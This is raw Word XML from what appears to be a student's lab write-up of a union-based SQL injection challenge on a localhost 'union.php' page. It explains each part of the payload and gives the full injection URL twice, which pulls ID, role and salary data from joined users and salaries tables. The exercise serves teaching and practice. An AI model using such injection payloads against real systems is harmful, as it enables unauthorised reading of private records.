                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>part</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D15A47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D15A47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D15A4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D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>existing</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsid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D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>localhost</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> link.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After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system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added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4233E7" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>“</w:t>
                      </w:r>
                      <w:r w:rsidR="004233E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?</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="004233E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username</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004233E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=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="004233E7" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>admin</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004233E7" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>”</w:t>
                      </w:r>
                      <w:r w:rsidR="004233E7">
                        <w:rPr>
                          <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:cs="AppleSystemUIFont"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="004233E7" w:rsidRPr="00D15A47">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>part</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004233E7" w:rsidRPr="00D15A4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existing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localhost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link</w:t>
                      </w:r>
                      <w:r w:rsidR="004233E7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concatenated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>/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added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m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y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end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233E7">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>localhost</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004233E7">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> URL.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In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my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firstly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by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using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a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single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quotation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mark, I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closed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>/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ended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starting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single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quotation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mark of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username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After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that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, since I am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supposed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perform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a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union-based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attack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in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this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challenge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used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F9178D" w:rsidRPr="00F9178D">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>UNION</w:t>
                      </w:r>
                      <w:r w:rsidR="00F9178D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operator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>/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keyword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F9178D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F9178D">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> SQL.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Subsequently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, since </w:t>
                      </w:r>
                      <w:r w:rsidR="002F1173">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">I am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supposed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display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only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salary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id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role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information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2F1173">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>users</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> in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C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> final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result</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00C11C85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C11C8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whole</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00C11C8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query</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="002F1173">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>, I</w:t>
                      </w:r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selected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id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, role,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salary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from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salaries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table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I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ignored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(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not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displayed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)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values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6921C6">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">rest of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by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using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6921C6" w:rsidRPr="006921C6">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>“</w:t>
                      </w:r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SELECT NULL, S.ID, NULL, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart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S.Role</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd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, NULL, NULL FROM </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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U JOIN </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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S ON (U.id=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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)</w:t>
                      </w:r>
                      <w:r w:rsidR="006921C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”</w:t>
                      </w:r>
                      <w:r w:rsidR="006921C6" w:rsidRPr="006921C6">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="006921C6">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">in </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="006921C6">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>my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C11C85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6921C6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In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this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part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my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selected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other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than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salary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, role,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id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salaries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4E66DB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>table</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004E66D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 xml:space="preserve">as </w:t>
                      </w:r>
                      <w:r w:rsidR="000F0065" w:rsidRP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>NULL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By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selecting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them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as </w:t>
                      </w:r>
                      <w:r w:rsidR="00B8376C" w:rsidRPr="00B8376C">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>NULL,</w:t>
                      </w:r>
                      <w:r w:rsidR="00B8376C">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> I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ignored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their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values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ensured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that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their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values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will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not be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displayed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in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final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result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cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>query</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00B8376C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In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order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select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I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want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used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0F0065" w:rsidRP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>SELECT</w:t>
                      </w:r>
                      <w:r w:rsid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statement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of SQL in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my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In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order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UNION-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based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queries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be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properly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executed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>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columns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0F0065" w:rsidRP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>SELECT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statements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which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are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at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left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right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0F0065" w:rsidRP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>UNION</w:t>
                      </w:r>
                      <w:r w:rsid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statement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must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same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order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Therefore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 xml:space="preserve">I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p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reserved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column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order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in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SELECT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statement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at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 w:rsidRPr="003530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>left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0F0065" w:rsidRPr="000F0065">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>UNION</w:t>
                      </w:r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operator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while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constructing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SELECT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statement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at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0F0065" w:rsidRPr="003530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>right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of </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="000F0065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0F0065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3530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">UNION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operator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>.</w:t>
                      </w:r>
                      <w:r w:rsidR="002A531C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After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I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use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3530BB" w:rsidRPr="003530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>SELECT</w:t>
                      </w:r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statement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in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my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payload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r w:rsidR="00140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">in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order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be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able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to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select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attributes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both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from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users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and salaries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table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, </w:t>
                      </w:r>
                      <w:r w:rsidR="003530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">I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j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oined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users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table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and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salaries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3530BB">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>table</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="003530BB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140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">on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userid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attribute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.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While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joining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those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tables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used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r w:rsidR="00140296" w:rsidRPr="00140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>JOIN</w:t>
                      </w:r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keyword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of SQL. As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the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joining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condition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, I </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>have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</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidR="00140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t>used</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00140296">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">  “</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="0014029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ON (U.id=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="0014029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r w:rsidR="00140296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)</w:t>
                      </w:r>
                      <w:r w:rsidR="00140296" w:rsidRPr="0014029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”</w:t>
                      </w:r>
                      <w:r w:rsidR="0014029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.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Because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r w:rsidR="0085128C" w:rsidRPr="0085128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U.id</w:t>
                      </w:r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proofErr w:type="gramStart"/>
                      <w:r w:rsidR="0085128C" w:rsidRPr="0085128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proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="0085128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are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common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attributes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table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.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Moreover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="0085128C" w:rsidRPr="0085128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U.id</w:t>
                      </w:r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attribute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table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proofErr w:type="gramStart"/>
                      <w:r w:rsidR="0085128C" w:rsidRPr="0085128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proofErr w:type="gram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attribute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table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are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highly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likely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primary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keys</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="0085128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.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Therefore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since it is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best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practice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it is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better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to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join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table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on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their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primary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keys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.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After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“</w:t>
                      </w:r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JOIN </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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salaries</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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S ON (</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/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U.id=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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S.userid</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00904B73" w:rsidRPr="006921C6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)</w:t>
                      </w:r>
                      <w:r w:rsidR="00904B73" w:rsidRP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”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part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have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WHERE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command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SQL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to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specify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conditions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query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at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left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UNION statement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.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In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this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challenge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 am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supposed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to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obtain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salary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role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information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for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with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age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40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salary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904B73" w:rsidRPr="00904B73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12000.</w:t>
                      </w:r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By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considering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ese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specific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conditions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have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WHERE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command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in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my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as </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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follows</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00904B7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: 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“</w:t>
                      </w:r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WHERE </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart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proofErr w:type="gramEnd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&gt; 12000 AND </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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S.age</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd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&gt; 40</w:t>
                      </w:r>
                      <w:r w:rsidR="002A531C" w:rsidRP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”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.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In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this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usage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, “</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart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S.salary</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd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&gt; 12000</w:t>
                      </w:r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” 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is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for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specifying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condition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that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salary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is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12000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 “</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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S.age</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="002A531C" w:rsidRP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&gt; 40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” is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for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specifying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situation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that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age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is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40.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To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ignore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comment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everything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that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comes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after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my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as it is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specified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in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SQL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syntax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have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="002A531C" w:rsidRP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--</w:t>
                      </w:r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(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two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>dashes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tr-TR"/>
                        </w:rPr>
                        <w:t xml:space="preserve">) </w:t>
                      </w:r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at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end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my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="002A531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.</w:t>
                      </w:r>
                      <w:r w:rsid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After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added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my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to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URL; as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you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can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see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in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screenshots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provided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above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at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end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by</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd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I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have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successfully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displayed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role,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salary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information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of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users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with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age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40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salary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more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than</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004E7986" w:rsidRPr="00B8376C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12000.</w:t>
                      </w:r>
                      <w:r w:rsidR="004E7986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Therefore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by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considering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corresponding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reasons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mentioned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and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related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screenshots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provided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above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, I can say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that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my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payload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is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successful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for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the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fourth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 xml:space="preserve"> </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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challenge</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="006F18D3"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  <w:t>.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="684348A9" w14:textId="77777777" w:rsidR="004E7986" w:rsidRDefault="004E7986" w:rsidP="006F18D3">
                      <w:pPr>
                        <w:spacing w:line="360" w:lineRule="auto"/>
                        <w:ind w:firstLine="708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tr-TR"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="73174FAD" w14:textId="77777777" w:rsidR="00140296" w:rsidRPr="000F0065" w:rsidRDefault="00140296" w:rsidP="004E66DB">
                      <w:pPr>
                        <w:spacing w:line="360" w:lineRule="auto"/>
                        <w:ind w:firstLine="708"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5D7B0384" w14:textId="77777777" w:rsidR="00F9178D" w:rsidRDefault="00F9178D" w:rsidP="00D15A47">
                      <w:pPr>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="45FF4425" w14:textId="77777777" w:rsidR="00F9178D" w:rsidRDefault="00F9178D" w:rsidP="00D15A47">
                      <w:pPr>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:lang w:val="tr-TR"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="39FA0970" w14:textId="2C2BA4A4" w:rsidR="00F4665C" w:rsidRPr="004233E7" w:rsidRDefault="00F4665C" w:rsidP="00D15A47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sectPr w:rsidR="00B13699" w:rsidRPr="00B1369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4FC45" w14:textId="77777777" w:rsidR="00CE35AC" w:rsidRDefault="00CE35AC" w:rsidP="0097619A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="01B283B2" w14:textId="77777777" w:rsidR="00CE35AC" w:rsidRDefault="00CE35AC" w:rsidP="009761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6203B" w14:textId="77777777" w:rsidR="00CE35AC" w:rsidRDefault="00CE35AC" w:rsidP="0097619A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="291A29F1" w14:textId="77777777" w:rsidR="00CE35AC" w:rsidRDefault="00CE35AC" w:rsidP="0097619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380"/>
    <w:rsid w:val="00004B19"/>
    <w:rsid w:val="00043ACA"/>
    <w:rsid w:val="000450F6"/>
    <w:rsid w:val="000F0065"/>
    <w:rsid w:val="00100D02"/>
    <w:rsid w:val="00112FC4"/>
    <w:rsid w:val="00121979"/>
    <w:rsid w:val="00140296"/>
    <w:rsid w:val="001765BF"/>
    <w:rsid w:val="001D74DA"/>
    <w:rsid w:val="001E02B9"/>
    <w:rsid w:val="001F1F4E"/>
    <w:rsid w:val="002006E5"/>
    <w:rsid w:val="00213D38"/>
    <w:rsid w:val="0021634C"/>
    <w:rsid w:val="00231739"/>
    <w:rsid w:val="00240F6E"/>
    <w:rsid w:val="002A531C"/>
    <w:rsid w:val="002F1173"/>
    <w:rsid w:val="00310B10"/>
    <w:rsid w:val="00340D85"/>
    <w:rsid w:val="003530BB"/>
    <w:rsid w:val="004233E7"/>
    <w:rsid w:val="004661A5"/>
    <w:rsid w:val="00471F0F"/>
    <w:rsid w:val="004A42E0"/>
    <w:rsid w:val="004E66DB"/>
    <w:rsid w:val="004E7986"/>
    <w:rsid w:val="00560F06"/>
    <w:rsid w:val="005F3A04"/>
    <w:rsid w:val="00642E2E"/>
    <w:rsid w:val="00684312"/>
    <w:rsid w:val="006921C6"/>
    <w:rsid w:val="006C5657"/>
    <w:rsid w:val="006F18D3"/>
    <w:rsid w:val="006F27AC"/>
    <w:rsid w:val="00730380"/>
    <w:rsid w:val="00731857"/>
    <w:rsid w:val="00790294"/>
    <w:rsid w:val="007A3420"/>
    <w:rsid w:val="007A66BD"/>
    <w:rsid w:val="007B1B20"/>
    <w:rsid w:val="007C571C"/>
    <w:rsid w:val="007F0463"/>
    <w:rsid w:val="008151D2"/>
    <w:rsid w:val="008272B1"/>
    <w:rsid w:val="00835727"/>
    <w:rsid w:val="00847D6E"/>
    <w:rsid w:val="0085128C"/>
    <w:rsid w:val="00886DAF"/>
    <w:rsid w:val="00904B73"/>
    <w:rsid w:val="0097619A"/>
    <w:rsid w:val="00987647"/>
    <w:rsid w:val="009B630A"/>
    <w:rsid w:val="00A42D67"/>
    <w:rsid w:val="00A64825"/>
    <w:rsid w:val="00A96C87"/>
    <w:rsid w:val="00AA1212"/>
    <w:rsid w:val="00AA240C"/>
    <w:rsid w:val="00AE5E3F"/>
    <w:rsid w:val="00B13699"/>
    <w:rsid w:val="00B233B5"/>
    <w:rsid w:val="00B53F66"/>
    <w:rsid w:val="00B8376C"/>
    <w:rsid w:val="00B90F0C"/>
    <w:rsid w:val="00BB09B7"/>
    <w:rsid w:val="00C11C85"/>
    <w:rsid w:val="00C12394"/>
    <w:rsid w:val="00C3003B"/>
    <w:rsid w:val="00C66AAD"/>
    <w:rsid w:val="00C91386"/>
    <w:rsid w:val="00CC5666"/>
    <w:rsid w:val="00CE35AC"/>
    <w:rsid w:val="00D03D5C"/>
    <w:rsid w:val="00D15A47"/>
    <w:rsid w:val="00D178DF"/>
    <w:rsid w:val="00D80D13"/>
    <w:rsid w:val="00DA42E6"/>
    <w:rsid w:val="00DA6ADC"/>
    <w:rsid w:val="00DF55BC"/>
    <w:rsid w:val="00E26519"/>
    <w:rsid w:val="00E31CA8"/>
    <w:rsid w:val="00E42323"/>
    <w:rsid w:val="00E77B78"/>
    <w:rsid w:val="00E845E8"/>
    <w:rsid w:val="00EB31C3"/>
    <w:rsid w:val="00EF7107"/>
    <w:rsid w:val="00F4665C"/>
    <w:rsid w:val="00F61511"/>
    <w:rsid w:val="00F801EF"/>
    <w:rsid w:val="00F9178D"/>
    <w:rsid w:val="00FA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2DD0E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13D5A2B9-0A7A-3E45-90CB-BB23111DA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uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00730380"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2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97619A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97619A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97619A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97619A"/>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Kpr">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B1369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13699"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD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60F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60F06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zlenenKpr">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA1E7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0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/union.php?username=admin%27%20UNION%20SELECT%20NULL,%20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--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localhost/union.php?username=admin%27%20UNION%20SELECT%20NULL,%20S.ID,%20NULL,%20S.Role,%20S.Salary,%20NULL,%20NULL%20FROM%20users%20U%20JOIN%20salaries%20S%20ON%20(U.id=S.userid)%20WHERE%20S.salary%20%3E%2012000%20AND%20S.age%20%3E%2040%20--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9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KAPLAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>BARIS KAPLAN</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-20T00:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-23T12:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>